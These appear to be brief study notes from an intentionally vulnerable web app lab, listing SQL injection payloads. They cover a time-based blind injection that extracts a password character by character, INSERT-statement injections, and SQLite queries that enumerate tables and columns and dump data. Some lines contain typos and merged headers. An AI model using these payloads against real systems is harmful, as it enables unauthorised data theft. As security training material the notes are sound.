- Blind SQL injection (login form / user)
Select * from users where login = ‘bee’AND ((SELECT IF(SUBSTRING(password,1,1) = ‘6’,SLEEP(5),null)FROM users WHERE login = ‘bee’))#
- Bypass sanitization by addslashes and mysql_real_escape_string
- Server Side Includes (SSI) injection and its causes
- SQL injection with INSERT Statement
INSERT INTO BLOG (data, entry, owner) values (now(), ‘a’,(SELECT version()))#
Time based SQL injection can also happen within INSERT STATEMENT:
INSERT INTO BLOG (data, entry, owner) valeus (now(), 'a',(SELECTIF ( substring (password,1,1) = "6", sleep(5), null )from users where id = 2))#
- SQLite Database Injection
INSERT INTO blog (id, date, entry, owner) VALUES (16,’2020–12–26',’atesting’, (select sqlite_version())) — ‘,’bee’);
Table Names:
atesting', (SELECT tbl_name FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%') )--Column Names:
atesting', (SELECT sql FROM sqlite_master WHERE type!="meta" AND sql NOT NULL AND name = "blog") )--Data!!!
atesting', (select entry from blog limit 1) )--
